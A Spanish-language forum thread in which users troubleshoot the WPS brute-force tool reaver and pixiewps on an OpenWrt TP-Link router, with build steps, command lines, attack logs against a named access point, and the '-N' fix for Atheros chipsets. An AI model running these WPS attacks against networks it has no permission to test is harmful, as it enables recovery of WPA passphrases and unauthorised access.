El libre pensamiento para un internet libre

No estas registrado.  

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#1 10-08-2018 01:52:10

javierbu
Usuario

Registrado: 09-08-2018
Mensajes: 55

Reaver en opwnwrt tplink tl wdr3600

Hola, saludos.

Hace algun tiempo probe reaver en openwrt en un tplink tl wdr3600

Desisti de hacer funcionar con pixie, pero estoy seguro que consegui que funcionara reaver.

Siguiendo el consejo de kcdtv, voy a volver a intentarlo de nuevo a ver si entre todos podemos hacer que funcione reaver primero, y pixie despues.

He instalado reaver desde opkg. La version es la 1.6.4 y al parecer ya trae la opcion para usar pixie. Adicionalmente instale el paquete de aircrack y el paquete pixiewps.

De momento, el primer intento es nulo. No funciona nada. Se queda esperando el beacon y de ahi no pasa.

Estoy usando el modo monitor puesto con airmon. Airodump corre perfectaente y me descubre las redes. He visto otro airmon-zc (uso el ng), que no se que diferencia haya, pero le falta alguna dependencia y no he llegado a probar con el.

El comando que estoy usando con reaver es muy basico: reaver -b bssid -c canal -i ifacemonitor -vvv. Como ya digo, se quedo a la espera del beacon y nunca pasa de ahi.

El chipset que me detecta airmon-ng es Atheros AR9300

El router con el que pruebo esta protegigo con apt rate timing, pero tiene intentos por probar, y aunque no fuera asi, reaver deberia intentar la negociacion, pero se queda esperando beacon.

He probado el mismo ataque al mismo router desde otro dispositivo, y reaver funciona como deberia

Alguna idea antes de buscar algo fuera de los repositorios o de tratar de compilarlo? para compilarlo, si no recuerdo mal, habia que compilar toda la imagen de openwrt? no quisiera llegar a eso.

No se si necesitan mas datos. cualquier cosa me dicen. Espero sus comentarios

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

#2 10-08-2018 05:35:47

javierbu
Usuario

Registrado: 09-08-2018
Mensajes: 55

Re: Reaver en opwnwrt tplink tl wdr3600

Actualizando un poco...

Intento instalar con opkg paquetes que encontré que compilé la vez pasada que jugué con esto, y nada . He descargado de github un par de ipk que en encontrado, y tampoco nada. No se instalan.

No tengo claro si opkg no permite instalar el local o que los paquetes están malformados, o que rayos sea. el caso es que dejé esa vía de momento... roll

Ahora está compilando una imagen de openwrt limpia con reaver, (o eso creo). neutral

Para ello me descargué su proyecto  https://github.com/openwrt/openwrt

Y desde la carpeta del proyecto hice:

./scripts/feeds update -a
./scripts/feeds install -a

make defconfig
make check-depends 

Aqui ya se quejó de algo : neutral

time: target/linux/prereq#0.30#0.01#0.37
make[1] check-depends
make -r check-depends: build failed. Please re-run make with -j1 V=s or V=sc for a higher verbosity level to see what's going on
/home/javier/openwrt/openwrt/include/toplevel.mk:216: fallo en las instrucciones para el objetivo 'check-depends'
make: *** [check-depends] Error 1

So lo obtuve ese error. La salida de los comandos que no se quejaron no viene al caso que las ponga. Continué con:

make prereq
make menuconfig

En este punto busco reaver, pixie, aircrack, y airmon los selecciono con un asterisco, y salgo guardando cambios.
Por ultimo:

make

smile Ahí quedó compilando. Espero que el error de dependencias no haga perder el tiempo.

Cualquier sugerencia | aclaración | corrección son bienvenidas tongue

Ultima edición por javierbu (10-08-2018 05:38:55)

Desconectado

#3 10-08-2018 17:37:17

javierbu
Usuario

Registrado: 09-08-2018
Mensajes: 55

Re: Reaver en opwnwrt tplink tl wdr3600

Nueva actualizacion

La compilación al parecer fue un éxito (o casi)

Se me generó la imagen deseada, y la instalé.

Primero decir que por suponer que ya traería Luci instalado por defecto, me toco reinstalarlo, pero que todos los males fueran esos... Para evitar este error, supongo que valdrá con buscarlo después del "make menuconfig" durante la compilación, seleccionarlo, y se debería instalar.

Al caso:

Reaver ya está vivo, pero no cumple su función. Desde los repositorios se instalaba una version 1.6.4, y ahora después de compilar, tengo una versión 1.6.5. Por desgracia se queda atascado sin podel colar ni un PIN.

Esta es la salida de reaver. (parte de su bucle, se queda así y de ahí nunca pasa) Creo haber sufrido esto mismo en kali no hace demasiadas versiones.

[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 6A:02:71:36:A9:E2 (ESSID: AXTEL XTREMO-A9E1)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M3 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 6A:02:71:36:A9:E2 (ESSID: AXTEL XTREMO-A9E1)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred

El siguiente código es contra el mismo router desde otro dispositivo haciedo el mismo ataque, pero este con éxito:

[+] Switching wlan1mon to channel 2
[?] Restore previous session for 6A:02:71:36:A9:E2? [n/Y] n
[+] Waiting for beacon from 6A:02:71:36:A9:E2
[+] Received beacon from 6A:02:71:36:A9:E2
[+] Vendor: Broadcom
[+] Trying pin "12345670"
[+] Associated with 6A:02:71:36:A9:E2 (ESSID: AXTEL XTREMO-A9E1)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin "00005678"

Con esto concluimos que reaver sigue sin funcionar.

Llegados a este punto, las opciones que se me ocurren es compilar de nuevo (esta vez sin olvidar luci), con otro mod de reaver distinto, o quiza falte alguna dependencia? Alguna otra manera de poner la tarjeta en modo monitor? estoy usando airmon-ng

Adjunto el código del Makefile que esta en /feeds/packages/network/reaver/ al realizar la compilación:

#
# Copyright (C) 2012-2015 OpenWrt.org
# Copyright (C) 2017 Yousong Zhou
#
# This is free software, licensed under the GNU General Public License v2.
# See /LICENSE for more information.
#

include $(TOPDIR)/rules.mk

PKG_NAME:=reaver
PKG_VERSION:=1.6.5
PKG_RELEASE:=1
PKG_MAINTAINER:=Yousong Zhou <[email protected]>

PKG_SOURCE:=$(PKG_NAME)-$(PKG_VERSION).tar.xz
PKG_SOURCE_URL:=https://github.com/t6x/reaver-wps-fork-t6x/releases/download/v$(PKG_VERSION)
PKG_HASH:=342e9d265cf459bd2387205b73a63d1fc7582e268f0e9aec20613f3ec11b6a6b

PKG_LICENSE:=GPL-2.0
PKG_LICENSE_FILES:=docs/LICENSE

PKG_USE_MIPS16:=0
PKG_AUTOMAKE_PATHS:=src
PKG_FIXUP:=autoreconf

include $(INCLUDE_DIR)/package.mk
CONFIGURE_PATH:=src
MAKE_PATH:=src

CONFIGURE_ARGS += --enable-savetocurrent

define Package/reaver
  SECTION:=net
  CATEGORY:=Network
  SUBMENU:=wireless
  TITLE:=Efficient brute force attack against Wifi Protected Setup
  URL:=https://github.com/t6x/reaver-wps-fork-t6x
  DEPENDS:=+libpcap
endef

define Package/reaver/description
  Reaver has been designed to be a robust and practical attack against Wi-Fi
  Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2
  passphrases. It has been tested against a wide variety of access points and
  WPS implementations.

  This is reaver-wps-fork-t6x, a community forked version, which has included
  various bug fixes and additional attack method (the offline Pixie Dust
  attack).
endef

define Package/reaver/install
	$(INSTALL_DIR) $(1)/usr/bin
	$(INSTALL_BIN) $(PKG_BUILD_DIR)/src/{reaver,wash} $(1)/usr/bin/
endef

$(eval $(call BuildPackage,reaver))

Alguna idea?

Desconectado

#4 10-08-2018 18:42:55

josep345
Usuario

Registrado: 19-11-2017
Mensajes: 649

Re: Reaver en opwnwrt tplink tl wdr3600

Rectifico mi mensaje,, espero que se solucione el problema con reaver,un saludo. wink

Ultima edición por josep345 (10-08-2018 18:53:39)


Debes Aprender que puedes hacer Todo bien y aun así fallar.

Creación Alargador USB-3.0 Con Cable RJ45   

Desconectado

#5 10-08-2018 19:05:05

javierbu
Usuario

Registrado: 09-08-2018
Mensajes: 55

Re: Reaver en opwnwrt tplink tl wdr3600

Hola josep345. Muchas gracias por la ayuda.

josep345 escribió:

Por lo que parece reaver trabaja bien,asocia con el AP y manda pins,puede ser que tu router no sea vulnerable por wps,o esté en modo pbc el router, de todas maneras puedes tener algún otro problema que no sea el que describo,esperamos que se resuelva tu problema con reaver,un saludo. wink

Por lo que me dices, no me expliqué bien. También subí el código que demuestra que el ap es vulnerable haciendo el mismo ataque con distinto dispositivo hacia el mismo ap, y misma distancia, unos 4 metros a la vista.

En la captura desde el caso con éxito, vemos que llega a recibir un message 3 y manda un messsage 4, y en el siguiente intento vuelve a probar con otro pin. Entiendo con eso que el ataque está funcionando.

El problema es en el tplink con openwrt. En la captura vemos que encuentra el ap, se asocia  a él, pero no hay intercamnio de messages. Entiendo que no está negociando nada, por lo tanto no está funcionando el ataque

Desconectado

#6 10-08-2018 19:08:37

josep345
Usuario

Registrado: 19-11-2017
Mensajes: 649

Re: Reaver en opwnwrt tplink tl wdr3600

Por lo que me dices, no me expliqué bien.

Mia culpa no había leído todo como creía,as estado muy rápido con el quote. big_smile

Ultima edición por josep345 (10-08-2018 19:11:53)


Debes Aprender que puedes hacer Todo bien y aun así fallar.

Creación Alargador USB-3.0 Con Cable RJ45   

Desconectado

#7 10-08-2018 19:20:14

javierbu
Usuario

Registrado: 09-08-2018
Mensajes: 55

Re: Reaver en opwnwrt tplink tl wdr3600

as estado muy rápido con el quote.

jeje, te pillé tongue
y ahora que procede? borro mi mensaje o lo dejo todo tal y como está? hmm

Desconectado

#8 10-08-2018 19:23:17

josep345
Usuario

Registrado: 19-11-2017
Mensajes: 649

Re: Reaver en opwnwrt tplink tl wdr3600

No borres nada compañero,somos humanos y no máquinas perfectas,es la esencia de la vida,cometer errores para saber subsanar en el futuro,esto me sirve de lección personal. cool

Ultima edición por josep345 (10-08-2018 19:24:15)


Debes Aprender que puedes hacer Todo bien y aun así fallar.

Creación Alargador USB-3.0 Con Cable RJ45   

Desconectado

#9 10-08-2018 21:35:42

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,487

Re: Reaver en opwnwrt tplink tl wdr3600

Nos haría falta ver la linea de ordenes que empleaste... Probaste con el argumento -N?
Cambien seria bien el resultado de airmon-ng para ver exactamente el chipset y el driver. Sé que has dado el chipset pero los atheros pueden tener varios nombre así que está bien ver el nombre tal y como lo detecta el sistema.

Desconectado

#10 10-08-2018 22:19:31

javierbu
Usuario

Registrado: 09-08-2018
Mensajes: 55

Re: Reaver en opwnwrt tplink tl wdr3600

Saludos kcdtv!.

kcdtv escribió:

Nos haría falta ver la linea de ordenes que empleaste... Probaste con el argumento -N?

[email protected]:~# reaver -N -b 6A:02:71:36:A9:E2 -c 2 -i mon0 -vv

Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching mon0 to channel 2
[+] Waiting for beacon from 6A:02:71:36:A9:E2
[+] Received beacon from 6A:02:71:36:A9:E2
[+] Vendor: Broadcom
[+] Trying pin "12345670"
[+] Sending authentication request
[!] Found packet with bad FCS, skipping...
[+] Sending association request
[+] Associated with 6A:02:71:36:A9:E2 (ESSID: AXTEL XTREMO-A9E1)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin "00005678"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 6A:02:71:36:A9:E2 (ESSID: AXTEL XTREMO-A9E1)
[+] Sending EAPOL START request

Tremendo avance. Ya pasa el pin. De una manera un poco guarra parece, pero pasar, pasa.

Cambien seria bien el resultado de airmon-ng para ver exactamente el chipset y el driver.

[email protected]:~# airmon-ng 

Interface	Chipset		Driver

mon0		Atheros AR9340	ath9k - [phy0]
wlan0		Atheros AR9340	ath9k - [phy0]

Ya pasa también el pixie. No tengo ningun ruter  vulnerable a mano, pero creo que con esto vale:

[+] Received M1 message
[+] Received M1 message
executing pixiewps -e 318877cd9e7e2053ef55ff0192729b9c5ab47b663ae48f12cd65db3507fa6bc48657d05e389b2ec4dbbe242831486bdcd4d57ec761536c6c05c1dc34a1e32a038b40c7b559d3195dc38b989bd9aef965d6012a22691f03debccf781bbe5865a9836a8a72cf2f3bd8a9f212959d82906acfd78024badecdf78f1ffc1bd3e749d0857aa599aad2f788d31c3df55533ad56d52f7cddec1f2967dfe3521918e9c50d0e2fd7daf3efe7d32dfc0bfdfef0a0e24fb88e429476567571388f9e960391ef -s faa1ba8df42e5c74dc6f178b2547ece2a55b5e143ec337a80a0dc1627c3889c2 -z 5effec6207b646c468693a390fa8be52f45dc9d4e9dcdc1a24e7ebf32a1860d7 -a cf59f416ea3ff8c1b1d4b3ef89f2d236c29c7bc46ea01f84b48dbb076b0dcc81 -n 53ccbeb77347f950fafaa559a67880ac -r 5d4c658d880eeedd37991824019820f4d18bceb5a652aef1040bf2a6f1e4b46a21b2efeadb3d2ea66bb4c96d1c4952f8decd8a7449d14786368fae9e20cf5a1fa52d70efd0e122e95c51cc5af9751b5910ceafe6b24c51dc91acfa4a3b232f5cc32d2e85c6cb5d0fa9e2dba7716705435922a7ed6741c70bc874e90fa9827de30bf99b3a0085abada8c09d467541e9e45847014916c780fc804de82d78250f44b9140f0b627dab89a33ab6a07898826b1d57f4028d33333f7b9e72f05e5b29a8

 Pixiewps 1.4

 [-] WPS pin not found!

 [*] Time taken: 15 s 402 ms

Asi que toda la culpa era de los NACK, que sabe dios que sea eso. Me queda la duda de si el reaver (1.6.4) que venía en los repositorios del binario que probé primero también funcionara con -N.

Ya solo me queda probar con la de 5 Ghz

Desconectado

#11 10-08-2018 22:32:53

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,487

Re: Reaver en opwnwrt tplink tl wdr3600

Tremendo avance. Ya pasa el pin. De una manera un poco guarra parece, pero pasar, pasa.

Con los ath9k es un poco guarro. Pero como dices pasa.

No tengo ningun ruter  vulnerable a mano, pero creo que con esto vale:

Se ha lanzado el intento con pixiewps correctamente, lo que pasa es que tu router no parece ser vulnerable.
Pero se ha hecho lo esperado. 

Asi que toda la culpa era de los NACK, que sabe dios que sea eso

el WSC NACK signifca que el router te rechaza. Cuando lo tienes después de un M4 significa que te dice que la primera del PIN no està bien y te rechaza. Cuando lo tienes después que haya mucho trafico sucio sin llegar al M4 significa que hay un problema en el intercambio.

Me queda la duda de si el reaver (1.6.4) que venía en los repositorios del binario que probé primero también funcionara con -N.

Diría que si pero podría ser que no... Lo siento por esta respuesta de mierda big_smile Hemos peleado mucho entre la version 1.6.3 y la 1.6.4 para dar soporta a los chipset ralink y algunos de los atheros tenían problemas muy similares. De todo modo creo es mejor quedarte con la 1.6.5.

Desconectado

#12 10-08-2018 23:10:49

javierbu
Usuario

Registrado: 09-08-2018
Mensajes: 55

Re: Reaver en opwnwrt tplink tl wdr3600

Muchas gracias. He sudado mucho con esto y que lo solucione solo un -N me hace sentir bastante inepto..

Desconectado

#13 11-08-2018 11:25:45

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,487

Re: Reaver en opwnwrt tplink tl wdr3600

¿Inepto? ¿¡Pero qué dices!? pam
Has resuelto el asunto solo desde la instalación hasta la puesta en marcha y solo te faltaba un pequeño detalla para lograrlo del todo... La necesidad de usar el argumento -N con algunos chipset es algo que no puedes imaginar si no lo sabes. Es que encima no hay nada en la descripción de la opción que te permite adivinar que es lo que faltaba.
Así que yo digo: ¡Bien hecho compañero! biere

Desconectado

#14 11-08-2018 11:50:59

josep345
Usuario

Registrado: 19-11-2017
Mensajes: 649

Re: Reaver en opwnwrt tplink tl wdr3600

Mi enhorabuena compañero has conseguido tu objetivo. cool


Debes Aprender que puedes hacer Todo bien y aun así fallar.

Creación Alargador USB-3.0 Con Cable RJ45   

Desconectado

#15 11-08-2018 19:51:13

javierbu
Usuario

Registrado: 09-08-2018
Mensajes: 55

Re: Reaver en opwnwrt tplink tl wdr3600

En la parte de conseguirlo, claro que estoy feliz y orgulloso, lo de inepto lo digo porque llevo muuuucho tiempo sin confiar en kali para auditar WPS, y eso me ha complicado bastante la vida, hasta el punto de tener que habilitar otro router expresamente para WPS. Ahora con el -N ya puedo usar kali también. 

Me siento inepto de que si es un error conocido no haya dado con él antes en todas las pateadas que me he dado por internet buscando soluciones.

De nuevo muchas gracias y muy buen trabajo manteniendo reaver e implementando los nuevos vectores.

Desconectado

#16 11-08-2018 22:39:42

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,487

Re: Reaver en opwnwrt tplink tl wdr3600

No está muy documentado porque las mejoras con el uso del argumento -N tienen menos de un ayo.. La mayoría de la documentación disponible es sobre reaver 1.4, y ya sabes como va esto: Si un tema lleva 5 anyos en un sitio conocido siempre saldrá antes en google aunque este completamente desfasado. Buenas noches. smile

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

Temas similares

Tema Respuestas Vistas Ultimo mensaje
4 65 Ayer 21:00:55 por Koala
7 167 Ayer 16:54:46 por kcdtv
Pegado:
Pegado:: 2ª Sorteo Del Mercadillo por josep345  [ 1 2 ]
44 1582 Ayer 16:53:17 por kcdtv
2 965 Ayer 16:03:32 por kcdtv
5 617 17-10-2018 18:15:16 por javierbu

Pie de página

Información del usuario

Ultimo usuario registrado: RandallJimenez
Usuarios registrados conectados: 0
Invitados conectados: 10

Estadisticas de los foros

Número total de usuarios registrados: 1,236
Número total de temas: 1,207
Número total de mensajes: 12,429

Máx. usuarios conectados: 71 el Ayer 06:35:48